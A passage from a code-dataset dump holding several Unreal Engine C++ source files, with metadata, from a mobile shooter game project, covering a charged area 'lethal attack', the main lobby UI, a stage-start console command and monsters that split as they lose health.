\"PG_DefineDelegate.generated.h\"\n\nDECLARE_MULTICAST_DELEGATE(FOnBtnClickedOK);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnClickedOK_OneValue, int32);\nDECLARE_MULTICAST_DELEGATE_OneParam(FOnBtnClickedCancel_OneValue, int32);\n\n\nUENUM()\nenum NoopEnum\n{\n\teNoopEnum,\n};\n" }, { "alpha_fraction": 0.7654265761375427, "alphanum_fraction": 0.7693604826927185, "avg_line_length": 29.060810089111328, "blob_id": "4d404a0843e0068d7cfe867bc81dfd48a4aa1274", "content_id": "3683334690f160a6710e143bd765d4d536276edc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9333, "license_type": "no_license", "max_line_length": 211, "num_lines": 296, "path": "/Source/Project_Gun/Private/BlueScriptObject/LethalAttack/PG_LethalAttack.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include 
\"BlueScriptObject/LethalAttack/PG_LethalAttack.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n\n#include <Components/AudioComponent.h>\n//#include <DrawDebugHelpers.h>\n\n// Sets default values\nAPG_LethalAttack::APG_LethalAttack()\n{\n \t// Set this actor to call Tick() every frame. You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tCollisionComponent = CreateDefaultSubobject<USphereComponent>(TEXT(\"SphereComponent\"));\n\tCollisionComponent->SetCollisionProfileName(TEXT(\"CharacterSkill\"));\n\n\tRootComponent = CollisionComponent;\n\n\tLShowingEffect = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"LShowingEffect\"));\n\tLShowingEffect->SetupAttachment(CollisionComponent);\n\tLShowingEffect->SetCollisionProfileName(TEXT(\"CharacterSkill\"));\n\tLShowingEffect->bAutoActivate = false;\n\n\tLEffectVisual = CreateDefaultSubobject<UParticleSystemComponent>(TEXT(\"LEffectVisual\"));\n\tLEffectVisual->SetupAttachment(CollisionComponent);\n\tLEffectVisual->SetCollisionProfileName(TEXT(\"CharacterSkill\"));\n\tLEffectVisual->OnSystemFinished.AddDynamic(this, &APG_LethalAttack::OnEndEffectVisual);\n\tLEffectVisual->bAutoActivate = false;\n\n\tLethalSoundComponent = CreateDefaultSubobject<UAudioComponent>(TEXT(\"LethalSoundComponent\"));\n\tLethalSoundComponent->bAutoActivate = false;\n\n\tLethalPoint = 0.0f;\n}\n\nvoid APG_LethalAttack::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tif (LShowingEffect)\n\t\tLShowingEffect->SetVisibility(false);\n\n\tif (LEffectVisual)\n\t\tLEffectVisual->SetVisibility(false);\n}\n\n// Called when the game starts or when spawned\nvoid APG_LethalAttack::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tOnInitLethal();\n}\n\n// Called every frame\nvoid APG_LethalAttack::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\tfloat fAttackRange = GetAttackRange();\n//\n//\tFVector TraceVec = GetActorForwardVector() * fAttackRange;\n//\tFVector Center = GetActorLocation();\n//\tfloat HalfHeight = fAttackRange;\n//\tFQuat CapsuleRot = FRotationMatrix::MakeFromZ(TraceVec).ToQuat();\n//\tFColor DrawColor = LethalPoint < LethalAttackData.LMinPoint ? 
FColor::Purple : FColor::Emerald;\n//\tfloat DebugLifeTime = 0.03f;\n//\n//\tDrawDebugCapsule(GetWorld(),\n//\t\tCenter,\n//\t\tHalfHeight,\n//\t\tfAttackRange,\n//\t\tCapsuleRot,\n//\t\tDrawColor,\n//\t\tfalse,\n//\t\tDebugLifeTime);\n//#endif\n}\n\n\nvoid APG_LethalAttack::BindPlayerState(class APG_MyPlayerState* APlayerState)\n{\n\tABCHECK(nullptr != APlayerState);\n\n\tHandleOnBasicAttackMonsterKill = APlayerState->OnDefaultAttackMonsterKill.AddUObject(this, &APG_LethalAttack::OnAddLethalPoint);\n\tHandleOnReadyToUseTheLethalAttack = APlayerState->OnReadyToUseTheLethalAttack.AddUObject(this, &APG_LethalAttack::OnReadyToUseTheLethalAttack);\n\tHandleOnUseTheLethalAttackSuccess = APlayerState->OnTryUseTheLethalAttack.AddUObject(this, &APG_LethalAttack::OnTryUseTheLethalAttack);\n\tHandleOnUseTheLethalAttackFail = APlayerState->OnUseTheLethalAttackFail.AddUObject(this, &APG_LethalAttack::OnUseTheLethalAttackFail);\n}\n\nvoid APG_LethalAttack::UnBindPlayerState(class APG_MyPlayerState* APlayerState)\n{\n\tABCHECK(nullptr != APlayerState);\n\n\tAPlayerState->OnDefaultAttackMonsterKill.Remove(HandleOnBasicAttackMonsterKill);\n\tAPlayerState->OnReadyToUseTheLethalAttack.Remove(HandleOnReadyToUseTheLethalAttack);\n\tAPlayerState->OnTryUseTheLethalAttack.Remove(HandleOnUseTheLethalAttackSuccess);\n\tAPlayerState->OnUseTheLethalAttackFail.Remove(HandleOnUseTheLethalAttackFail);\n}\n\nvoid APG_LethalAttack::SetLethaAttackData(const FPGLethalAttackData* pLethalAttackData)\n{\n\tLethalAttackData = *pLethalAttackData;\n}\n\nbool APG_LethalAttack::IsReadyLethal()\n{\n\treturn (LethalPoint >= LethalAttackData.LMinPoint);\n}\n\nfloat APG_LethalAttack::GetAttackRange()\n{\n\t// The lethal attack's hit range is the attack's \"maximum range (LMaxRange)\" divided by its \"maximum point (LMaxPoint)\",\n\t// then multiplied by the player's \"current lethal point (LethalPoint)\".\n\t// Ex) When using the StrongWindAttack lethal attack (LMaxRange: 300, LMaxPoint: 100),\n\t// if the player's \"current lethal point (LethalPoint)\" is 60, the resulting attack range is 180. 
\n\treturn (float)(LethalAttackData.LMaxRange / LethalAttackData.LMaxPoint) * (float)LethalPoint;\n}\n\nfloat APG_LethalAttack::GetRatioAttackRange()\n{\n\treturn GetAttackRange() / (float)LethalAttackData.LMaxRange;\n}\n\nbool APG_LethalAttack::FindingDamagedMonsters(OUT TArray<class APG_MonChar*>& GetMonsters)\n{\n\tfloat fAttackRange = GetAttackRange();\n\n\tTArray<FHitResult> HitResult;\n\tFCollisionQueryParams Params(NAME_None, false, this);\n\n\tbool bResult = GetWorld()->SweepMultiByChannel(\n\t\tHitResult,\n\t\tGetActorLocation(),\n\t\tGetActorLocation(),\n\t\tFQuat::Identity,\n\t\tECollisionChannel::ECC_GameTraceChannel4,\n\t\tFCollisionShape::MakeSphere(fAttackRange),\n\t\tParams);\n\n//#ifdef ENABLE_DRAW_DEBUG\n//\tFVector TraceVec = GetActorForwardVector() * fAttackRange;\n//\tFVector Center = GetActorLocation();\n//\tfloat HalfHeight = fAttackRange;\n//\tFQuat CapsuleRot = FRotationMatrix::MakeFromZ(TraceVec).ToQuat();\n//\tFColor DrawColor = FColor::Orange;\n//\tfloat DebugLifeTime = 1.0f;\n//\n//\tDrawDebugCapsule(GetWorld(),\n//\t\tCenter,\n//\t\tHalfHeight,\n//\t\tfAttackRange,\n//\t\tCapsuleRot,\n//\t\tDrawColor,\n//\t\tfalse,\n//\t\tDebugLifeTime);\n//#endif\n\n\tif (bResult)\n\t{\n\t\tfor (auto Monster : HitResult)\n\t\t{\n\t\t\tauto AMonster = Cast<class APG_MonChar>(Monster.GetActor());\n\t\t\tif (AMonster)\n\t\t\t\tGetMonsters.Add(AMonster);\n\t\t}\n\t}\n\n\treturn bResult;\n}\n\n\nvoid APG_LethalAttack::OnReadyToUseTheLethalAttack()\n{\n\tif (LShowingEffect && false == LShowingEffect->IsVisible())\n\t{\n\t\tfloat fScale = GetAttackRange();\n\t\tLShowingEffect->SetRelativeScale3D(FVector(fScale, fScale, fScale));\n\t\tLShowingEffect->SetActive(true, true);\n\t\tLShowingEffect->SetVisibility(true);\n\t}\n}\n\nvoid APG_LethalAttack::OnUseTheLethalAttackFail()\n{\n\n}\n\nvoid APG_LethalAttack::OnTryUseTheLethalAttack()\n{\n\tif (LethalPoint < LethalAttackData.LMinPoint)\n\t\treturn;\n\n\t// Hide the lethal attack charging effect\n\tif (LShowingEffect && LShowingEffect->IsVisible())\n\t{\n\t\tLShowingEffect->SetVisibility(false);\n\t}\n\n\t// Play the lethal attack effect, scaled to the charged range\n\tif (LEffectVisual && false == LEffectVisual->IsVisible())\n\t{\n\t\tfloat fScale = GetAttackRange() / 100.0f;\n\t\tLEffectVisual->SetRelativeScale3D(FVector(fScale, fScale, fScale));\n\t\tLEffectVisual->SetActive(true, true);\n\t\tLEffectVisual->SetVisibility(true);\n\t}\n\n\t// Detach the object from the character and fix its position in the world.\n\tDetachFromActor(FDetachmentTransformRules::KeepWorldTransform);\n\n\t// Damage the monsters within the lethal attack range and find the ones killed by it.\n\tTArray<class APG_MonChar*> DamagedMonsters;\n\tFindingDamagedMonsters(DamagedMonsters);\n\tfor (auto AMonster : DamagedMonsters)\n\t{\n\t\tif (AMonster && false == AMonster->IsActorBeingDestroyed())\n\t\t{\n\t\t\tABLOG(Warning, TEXT(\"DamageMonster : %s\"), *AMonster->GetName());\n\t\t\tif (AMonster->OnDamage(LethalAttackData.LPower, true))\n\t\t\t{\n\t\t\t\tMaxLethalKill += 1;\n\t\t\t}\n\t\t}\n\t}\n\n\t// Unequip the character's lethal attack\n\tauto AMyChar = Cast<APG_MyChar>(GetOwner());\n\tif (AMyChar)\n\t\tAMyChar->UnEquipLethalAttack();\n\n\t// Tally the killed monsters and pass the count to the GameStateStage.\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (pGameStateStage)\n\t\tpGameStateStage->SetMaxLethalKill(MaxLethalKill);\n\n\t// Play the lethal attack sound\n\tif (LethalSoundComponent)\n\t\tLethalSoundComponent->Play();\n}\n\nvoid APG_LethalAttack::OnAddLethalPoint(class APG_MonChar* AMonster)\n{\n\tif (LethalPoint > LethalAttackData.LMaxPoint)\n\t\treturn;\n\n\tLethalPoint++;\n\n\tif (LShowingEffect && 
LShowingEffect->IsVisible())\n\t{\n\t\tfloat fScale = GetAttackRange() / 100.0f;\n\t\tLShowingEffect->SetRelativeScale3D(FVector(fScale, fScale, fScale));\n\t}\n\n\tif (false == m_bReadyLethal && IsReadyLethal())\n\t{\n\t\tm_bReadyLethal = true;\n\t\tOnReadyLethal();\n\t}\n}\n\nvoid APG_LethalAttack::OnEndEffectVisual(UParticleSystemComponent* ParticleSystemComponent)\n{\n\tDestroy();\n}\n\nvoid APG_LethalAttack::OnBegineOverlap(UPrimitiveComponent* OverlappedComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult)\n{\n\tauto AMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (AMonCharacter)\n\t{\n\t\tABLOG(Warning, TEXT(\"Lethal Damage : %s\"), *AMonCharacter->GetName());\n\t\tAMonCharacter->OnDamage(LethalAttackData.LPower, true);\n\t}\n}\n\nvoid APG_LethalAttack::OnParticleCollide(FName EventName, float EmitterTime, int32 ParticleTime, FVector Location, FVector Velocity, FVector Direction, FVector Normal, FName BoneName, UPhysicalMaterial* PhysMat)\n{\n\n}\n\nvoid APG_LethalAttack::OnComponentHit(UPrimitiveComponent* HitComponent, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\tauto AMonCharacter = Cast<APG_MonChar>(OtherActor);\n\tif (AMonCharacter)\n\t{\n\t\tABLOG(Warning, TEXT(\"Lethal Damage : %s\"), *AMonCharacter->GetName());\n\t\tAMonCharacter->OnDamage(LethalAttackData.LPower, true);\n\t}\n}" }, { "alpha_fraction": 0.7204219102859497, "alphanum_fraction": 0.7224880456924438, "avg_line_length": 31.84642791748047, "blob_id": "8d3d31e940a99a2305ae36c4aef48571ee5728d6", "content_id": "e3743bb002a5d69e26333805fad5c12be5d31670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9368, "license_type": "no_license", "max_line_length": 118, "num_lines": 280, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetMainLobby_Renewal.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetMainLobby_Renewal.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"UI/PG_UserWidgetWeaponInventory.h\"\n#include \"UI/PG_UserWidgetScreenShop.h\"\n#include \"Game/GameMode/PG_GameModeMainLobby.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"SaveData/PG_SavePlayerData.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n#include <Components/CanvasPanel.h>\n#include <Components/ScaleBox.h>\n\n\nvoid UPG_UserWidgetMainLobby_Renewal::NativeConstruct()\n{\n\n\t//===========================================\n\t// Canvas TopMenu\n\t//===========================================\n\t//PG_WIDGET_LINK(UUserWidget, WB_RewardPoint);\n\tPG_WIDGET_LINK(UButton, BtnOption);\n\n\t//===========================================\n\t// Canvas StageSelect\n\t//===========================================\n\tPG_WIDGET_LINK(UButton, BtnSelectStagePrev);\n\tPG_WIDGET_LINK(UButton, BtnSelectStageNext);\n\tPG_WIDGET_LINK(UTextBlock, TextSelectedStage);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasSelectStageLock);\n\n\t//===========================================\n\t// Canvas Mission\n\t//===========================================\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\tPG_WIDGET_LINK(UTextBlock, TextMainLobbyFlag);\n\tPG_WIDGET_LINK(UTextBlock, TextMainLobbyLethal);\n\tPG_WIDGET_LINK(UTextBlock, 
TextMainLobbyTime);\n\n\t//===========================================\n\t// Canvas MenuButtons\n\t//===========================================\n\tPG_WIDGET_LINK(UButton, BtnGameStart);\n\tPG_WIDGET_LINK(UButton, BtnShop);\n\tPG_WIDGET_LINK(UCanvasPanel, CanvasGameStart);\n\n\t//===========================================\n\t// Canvas WeaponBox (weapon slots)\n\t//===========================================\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetWeaponBox, WB_WeaponBox, eMaxWeaponSlot);\n\n\tint nIndex = 0;\n\tfor (auto Box : m_pkWB_WeaponBox)\n\t{\n\t\tif (Box)\n\t\t{\n\t\t\tBox->SetEnable(false);\n\t\t\tBox->SetSlotIndex(nIndex++);\n\t\t\tBox->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetMainLobby_Renewal::OnOpenWeaponInventory);\n\t\t}\n\t}\n\n\t//===========================================\n\t// Canvas ADBanner\n\t//===========================================\n\n\t//===========================================\n\t// Canvas WeaponInventory (weapon inventory)\n\t//===========================================\n\tPG_WIDGET_LINK(UScaleBox, ScaleWeaponInventory);\n\tPG_WIDGET_LINK(UPG_UserWidgetWeaponInventory, WB_WeaponInventory);\n\tm_pkWB_WeaponInventory->OnBtnClickedClose.AddUObject(this, &UPG_UserWidgetMainLobby_Renewal::OnCloseWeaponInventory);\n\n\tSuper::NativeConstruct();\n\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::UpdateLayoutStage()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tint32 nSelectedStageID = pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tconst FPGStageData* cpNextStageData = pGameInstance->GetTableStageData(nSelectedStageID + 1);\n\tconst FPGStageData* cpPrevStageData = pGameInstance->GetTableStageData(nSelectedStageID - 1);\n\n\tm_pkBtnSelectStageNext->SetIsEnabled((nullptr != cpNextStageData));\n\tm_pkBtnSelectStagePrev->SetIsEnabled((nullptr != cpPrevStageData));\n\n\tbool bIsFirstPlayCurrStage = pGameModeMainLobby->IsFirstPlayStage(nSelectedStageID);\n\tbool bIsFirstPlayNextStage = pGameModeMainLobby->IsFirstPlayStage(nSelectedStageID + 1);\n\tbool bIsFirstPlayPrevStage = pGameModeMainLobby->IsFirstPlayStage(nSelectedStageID - 1);\n\n\t// Playing this stage for the first time\n\tif (bIsFirstPlayCurrStage)\n\t{\n\t\tif (1 == nSelectedStageID || false == bIsFirstPlayPrevStage)\n\t\t{\n\t\t\tm_pkCanvasSelectStageLock->SetVisibility(ESlateVisibility::Hidden);\n\t\t\tm_pkCanvasGameStart->SetIsEnabled(true);\n\t\t}\n\t\t// The next stage has not been played yet\n\t\telse if (bIsFirstPlayNextStage)\n\t\t{\n\t\t\tm_pkCanvasSelectStageLock->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\t\tm_pkCanvasGameStart->SetIsEnabled(false);\n\t\t}\n\t}\n\telse\n\t{\n\t\tm_pkCanvasSelectStageLock->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkCanvasGameStart->SetIsEnabled(true);\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::UpdateLayoutMission()\n{\n\t//m_pkWB_RewardPoint->UpdateRewardPoint();\n\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pSavePlayerData = pGameModeMainLobby->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tint32 nSelectedStageID = 
pGameModeMainLobby->GetPlayStageID();\n\tconst FPGStageData* cpStageData = pGameInstance->GetTableStageData(nSelectedStageID);\n\tABCHECK(nullptr != cpStageData);\n\n\tbool bIsClearAmount = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_AmountKill);\n\tbool bIsClearTime = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_ClearTime);\n\tbool bIsClearLethal = pGameModeMainLobby->IsClearMission(EStageClearType::eSCT_Lethal);\n\n\tm_pkBtnFlag->SetIsEnabled(!bIsClearAmount);\n\tm_pkBtnLethal->SetIsEnabled(!bIsClearLethal);\n\tm_pkBtnTime->SetIsEnabled(!bIsClearTime);\n\n\tm_pkTextMainLobbyFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->M_Amount)));\n\tm_pkTextMainLobbyLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Multi_Kill)));\n\tm_pkTextMainLobbyTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), cpStageData->Time)));\n\n\tm_pkTextSelectedStage->SetText(FText::FromString(cpStageData->StageName));\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::UpdateLayoutWeaponSlot()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tauto pSavePlayerData = pGameModeMainLobby->GetSavePlayerData();\n\tABCHECK(nullptr != pSavePlayerData);\n\n\tint nIndex = 0;\n\tfor (auto WeaponSlot : m_pkWB_WeaponBox)\n\t{\n\t\tABCHECK(nullptr != WeaponSlot);\n\t\tWeaponSlot->SetWeaponIndex(pGameModeMainLobby, pSavePlayerData->m_kEquipWeaponTableIndex[nIndex]);\n\n\t\tif (PG_MAX_WEAPON_SLOT - 1 == nIndex)\n\t\t\tWeaponSlot->SetEnable(pSavePlayerData->m_bExtendWeaponSlot);\n\t\telse\n\t\t\tWeaponSlot->SetEnable(true);\n\n\t\tnIndex++;\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnOption()\n{\n\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnSelectStageNext()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\n\tABCHECK(pGameModeMainLobby->SetNextStageID());\n\tUpdateLayoutStage();\n\tUpdateLayoutMission();\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnSelectStagePrev()\n{\n\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeMainLobby);\n\tABCHECK(pGameModeMainLobby->SetPrevStageID());\n\tUpdateLayoutStage();\n\tUpdateLayoutMission();\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnGameStart()\n{\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase);\n\n\tif (pGameModeBase->StartGame())\n\t{\n\t\tGetWorld()->GetGameViewport()->RemoveAllViewportWidgets();\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnBtnShop()\n{\n\tauto GameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != GameInstance);\n\n\tif (nullptr == m_pWBShop)\n\t{\n\t\tm_pWBShop = CreateWidget<UPG_UserWidgetScreenShop>(this, WB_ShopClass);\n\t\tABCHECK(nullptr != m_pWBShop);\n\t}\n\n\tGetWorld()->GetGameViewport()->RemoveAllViewportWidgets();\n\tm_pWBShop->AddToViewport();\n\tm_pWBShop->Init();\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnOpenWeaponInventory(int32 nSlotIndex)\n{\n\tABCHECK(nullptr != m_pkWB_WeaponInventory);\n\n\t// The first inventory slot must use the default rifle, so it cannot be changed. 
\n\tif (0 == nSlotIndex)\n\t\treturn;\n\n\t// Open the inventory window.\n\tm_pkScaleWeaponInventory->SetVisibility(ESlateVisibility::Visible);\n\tm_pkWB_WeaponInventory->SetOpenSlotIndex(nSlotIndex);\n\tm_pkWB_WeaponInventory->SetVisibility(ESlateVisibility::Visible);\n\tm_pkWB_WeaponInventory->UpdateWeaponInventory();\n\n\tm_pkWB_WeaponBox[nSlotIndex]->SetEnableLightBox(true);\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnCloseWeaponInventory(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\tABCHECK(nullptr != m_pkWB_WeaponInventory);\n\n\t// The inventory window is closed\n\tm_pkScaleWeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\tm_pkWB_WeaponBox[nSlotIndex]->SetEnableLightBox(false);\n\tif (PG_INVALID_INDEX != nWeaponIndex)\n\t{\n\t\tauto pGameModeMainLobby = Cast<APG_GameModeMainLobby>(GetWorld()->GetAuthGameMode());\n\t\tABCHECK(nullptr != pGameModeMainLobby);\n\t\tpGameModeMainLobby->SaveWeaponEquipSlot(nSlotIndex, nWeaponIndex);\n\n\t\tUpdateLayoutWeaponSlot();\n\t}\n}\n\nvoid UPG_UserWidgetMainLobby_Renewal::OnDoNotChangeCloseWeaponInventory()\n{\n\tABCHECK(nullptr != m_pkWB_WeaponInventory);\n\n\t// The inventory window is closed without any change\n\tm_pkScaleWeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\tm_pkWB_WeaponInventory->SetVisibility(ESlateVisibility::Hidden);\n\n\tfor (auto WeaponBox : m_pkWB_WeaponBox)\n\t{\n\t\tif (WeaponBox)\n\t\t\tWeaponBox->SetEnableLightBox(false);\n\t}\n}"
Time_Clear;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UOverlay* Time_InProgress;\n\tUPROPERTY(BlueprintReadWrite)\n\tclass UTextBlock* Text_CurrTime;\n};\n" }, { "alpha_fraction": 0.7372727394104004, "alphanum_fraction": 0.7372727394104004, "avg_line_length": 22.4255313873291, "blob_id": "c1e364182d5d3cb86db4610d1fc38b6dda409d9f", "content_id": "0360acfbdd024a0a63ea7d4dad80467cd2a512f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1102, "license_type": "no_license", "max_line_length": 116, "num_lines": 47, "path": "/Source/Project_Gun/Private/Game/Console/Commands/PG_CommandStartStage.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Game/Console/Commands/PG_CommandStartStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\nPG_CommandStartStage::PG_CommandStartStage()\n{\n}\n\nPG_CommandStartStage::~PG_CommandStartStage()\n{\n}\n\nvoid PG_CommandStartStage::UpdateCommand()\n{\n\tif (bOnCommand)\n\t{\n\t\tbOnCommand = false;\n\t\tExcute();\n\t}\n}\n\nvoid PG_CommandStartStage::Excute()\n{\n\tABCHECK(nullptr != G_PGWorld);\n\tABCHECK(nullptr != m_pConsoleVariable);\n\n\tauto pGameMdoe = Cast<APG_GameModeBase>(G_PGWorld->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMdoe);\n\n\t//auto pGameInstance = Cast<UPG_GameInstance>(G_PGWorld->GetGameInstance());\n\t//ABCHECK(nullptr != pGameInstance);\n\n\tif (false == pGameMdoe->SetPlayStageID(m_pConsoleVariable->GetInt()))\n\t{\n\t\tABLOG(Warning, TEXT(\"There is no corresponding stage information. (StageID ; %d)\"), m_pConsoleVariable->GetInt());\n\t}\n\n\tpGameMdoe->StartGame();\n}\n\nvoid PG_CommandStartStage::OnChangeCommand()\n{\n\tABCHECK(nullptr != m_pConsoleVariable);\n\tbOnCommand = true;\n}" }, { "alpha_fraction": 0.7899065613746643, "alphanum_fraction": 0.7977570295333862, "avg_line_length": 30.11627960205078, "blob_id": "516cfaad82c0cf2b3f5065de4440d11c40011353", "content_id": "45c39274cef24df3d5ff08a860f0324f95f0f32c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2685, "license_type": "no_license", "max_line_length": 129, "num_lines": 86, "path": "/Source/Project_Gun/Private/Character/PG_MonCharDivision.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharDivision.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/Component/PG_ComponentDivisionSpawn.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharDivision::APG_MonCharDivision()\n{\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n\tDivisionSpawnComponent = CreateDefaultSubobject<UPG_ComponentDivisionSpawn>(TEXT(\"COMPONENTDIVISIONSPAWN\"));\n\tm_bIsDivisionChild = false;\n}\n\nvoid APG_MonCharDivision::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_MonCharDivision::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterDivisionData.MRemainDivisionCount = MonsterDivisionData.MDivisionCount;\n\tMonsterData = &MonsterDivisionData;\n}\n\nint32 APG_MonCharDivision::GetDivisionCountToHPRatio()\n{\n\tif (MonsterDivisionData.MRemainDivisionCount <= 0 || 0.0f >= GetHPRatio())\n\t\treturn 0;\n\n\tfloat fActiveHPRatio = 1.0f / (MonsterDivisionData.MDivisionCount + 
1);\n\treturn (int32)(GetHPRatio() / fActiveHPRatio);\n}\n\nbool APG_MonCharDivision::IsPossibleToDivision()\n{\n\tif (0 >= MonsterDivisionData.MRemainDivisionCount || 0 >= MonsterDivisionData.MDivisionCount)\n\t\treturn false;\n\n\t// HP band in which division is possible\n\tfloat fPossibleToDivions_HPRatio = (1.0f / (MonsterDivisionData.MDivisionCount + 1)) * MonsterDivisionData.MRemainDivisionCount;\n\treturn (GetHPRatio() < fPossibleToDivions_HPRatio);\n}\n\nbool APG_MonCharDivision::IsDivisionChild()\n{\n\treturn m_bIsDivisionChild;\n}\n\nvoid APG_MonCharDivision::SetMonsterDataDivision(FPGMonsterData_Division& MonsterData_Division)\n{\n\tMonsterDivisionData = MonsterData_Division;\n}\n\nbool APG_MonCharDivision::OnDamage(int32 nDamage, bool IsUseLetharAttack)\n{\n\tbool bIsDie = Super::OnDamage(nDamage, IsUseLetharAttack);\n\n\tif (false == bIsDie && IsPossibleToDivision())\n\t{\n\t\tif (0 < MonsterDivisionData.MRemainDivisionCount)\n\t\t{\n\t\t\tFVector vRange(MonsterDivisionData.MDivisionSpawnRange, MonsterDivisionData.MDivisionSpawnRange, 0.0f);\n\t\t\tif (DivisionSpawnComponent)\n\t\t\t\tDivisionSpawnComponent->DivisionSpawnActor<APG_MonCharDivision>(MonsterDivisionData.MDivisionAmount, vRange);\n\t\t}\n\n\t\tMonsterDivisionData.MRemainDivisionCount = GetDivisionCountToHPRatio();\n\t}\n\n\treturn bIsDie;\n}\n\nvoid APG_MonCharDivision::OnSpawnActor(APG_MonCharDivision* ASpawnActor)\n{\n\tABCHECK(nullptr != ASpawnActor);\n\n\tFPGMonsterData_Division MakeMonsterData_Division = MonsterDivisionData;\n\tMakeMonsterData_Division.MRemainDivisionCount = GetDivisionCountToHPRatio();\n\tASpawnActor->m_bIsDivisionChild = 